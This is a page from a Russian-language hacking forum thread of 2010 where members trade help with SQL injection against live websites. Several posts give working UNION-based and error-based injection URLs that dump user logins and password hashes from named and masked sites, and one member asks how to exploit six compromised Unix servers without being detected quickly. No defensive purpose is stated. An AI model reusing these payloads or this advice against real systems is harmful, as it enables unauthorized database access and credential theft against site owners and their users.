HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 1137 из 2438 « Первая < 137637103710871127 1133 1134 1135 1136 1137 1138 1139 1140 1141 11471187123716372137 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #11361  
Старый 27.01.2010, 20:10
xcedz
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
С нами: 9644006

Репутация: 3099


По умолчанию
Цитата:
Сообщение от aka_google  
Database Version: 5.0.32-Debian_7etch5-log

Проблемма такова делаю выборку :

_http://www.skr.su/?div=spec&id=1344+UNION+SELECT+1,2,3,4,5,6,7,8,9,1 0,11,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x2d2d2d2d,log in,0x2d2d2d2d,pass,0x2d2d2d2d),0x71),0x71),13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31, 32,33,34,35,36,37,38,39,40,41,42,43,44,45,46+FROM+ users+LIMIT+1,1--
показывает такой пароль админа (їљџ·„‚7) , причем смотрите сами такие пароли с аброкадаброй у вех пользователей .

кто что думает ?

зато вобла ловится

http://www.skr.su/?div=spec&id=-1344+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,hex(unhe x(password)),13,14,15,16,17,18,19,20,21,22,23,24,2 5,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41, 42,43,44,45,46+FROM+forum_user--
 
Ответить с цитированием

  #11362  
Старый 27.01.2010, 21:38
RedX
Познающий
Регистрация: 12.06.2008
Сообщений: 32
С нами: 9427499

Репутация: 22
По умолчанию
Посоветуйте, что можно сделать с шестью юникс дедиками имея на них только юзер привелегии? Желательно что нибудь полезное и что бы не сразу впалили.
 
Ответить с цитированием

  #11363  
Старый 27.01.2010, 22:30
Gidz
Познающий
Регистрация: 10.08.2009
Сообщений: 30
С нами: 8816961

Репутация: 4
По умолчанию
хелп, помогите победить
Код:
http://xxx/browse.php?cat=999999999'+union+select+1,2,3,4,5,6+--+
Последний раз редактировалось Gidz; 27.01.2010 в 22:55..
 
Ответить с цитированием

  #11364  
Старый 27.01.2010, 22:38
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
С нами: 9780227

Репутация: 1423
По умолчанию
http://[закрыто по просьбе правообладателя]/browse.php?cat=5'+and+1=2+union+select+111,222,333 ,concat_ws(0x2F,version(),database(),user()),555,6 66--+

В сурсе
Цитата:
<p align='center'>The directory you requested could not be found. If you believe this is a bug, please contact <a href='mailto:?subject=Dir Not Found: /files/5.0.51b-log/fusion/fusion@ginger'>sir</a>.</p>
Последний раз редактировалось ElteRUS; 27.01.2010 в 22:54..
 
Ответить с цитированием

  #11365  
Старый 27.01.2010, 22:58
v1d0qz
Познающий
Регистрация: 21.07.2007
Сообщений: 68
С нами: 9898501

Репутация: 257
По умолчанию
http://[hide]/browse.php?cat=5%27+or(1,1)=(select+count(0),conca t((select+concat_ws(0x3a,table_name,column_name)+f rom+information_schema.columns+where+column_name+L IKE+%27%password%%27+LIMIT+0,1),floor(rand(0)*2))f rom(information_schema.tables)GROUP+BY+2)--++

ну или так, если ты не хочешь колупать сорцы. ps. кури ману.
Последний раз редактировалось v1d0qz; 27.01.2010 в 23:03..
 
Ответить с цитированием

  #11366  
Старый 28.01.2010, 12:15
kfor
Участник форума
Регистрация: 01.09.2005
Сообщений: 194
С нами: 10889431

Репутация: 34
По умолчанию
Даже не знаю где спросить. Ни у кого нету словарика таблиц и колонок, для 4-й ветки мускула? Я помню тут постили , тока найти не могу чё то.
 
Ответить с цитированием

  #11367  
Старый 28.01.2010, 12:35
shell_c0de
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
С нами: 8866466

Репутация: 564
По умолчанию
2kfor
https://forum.antichat.ru/nextnewesttothread56632.html
http://forum.antichat.ru/thread45790.html
 
Ответить с цитированием

  #11368  
Старый 28.01.2010, 13:16
Seravin
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
С нами: 8663063

Репутация: 226
По умолчанию
Group_concat(table_name) всегда возвращает все таблицы(если есть доступ к information_schema)? И как чтобы он по базам возвращал а не все таблицы разом?
 
Ответить с цитированием

  #11369  
Старый 28.01.2010, 13:49
LokbatanLi
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
С нами: 8797559

Репутация: -16
По умолчанию
Seravin:

http://www.site.com/news.php?id=-1+union+select+0,1,group_concat(table_name),2+from +information_schema.tables+where+schema_name='xxx'
 
Ответить с цитированием

  #11370  
Старый 28.01.2010, 13:52
0nep@t0p
Участник форума
Регистрация: 25.05.2007
Сообщений: 147
С нами: 9981026

Репутация: 728
По умолчанию
функция group_concat имеет ограничение на размер возвращаемых ей данных - 1024 символа, поэтому если таблиц слишком много в бд, то выведет не все
по базам -
select group_concat(table_name) from information_schema.tables where table_schema='имя_базы'
 
Ответить с цитированием
Ответ
Страница 1137 из 2438 « Первая < 137637103710871127 1133 1134 1135 1136 1137 1138 1139 1140 1141 11471187123716372137 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Внести депозит

Введите сумму USDT:

Принимается только USDT TRC20. Fake/Flash USDT не засчитывается.

×

Вывести депозит

Сумма USDT:

Ваш USDT TRC20 кошелек:

Заявка будет отправлена администратору.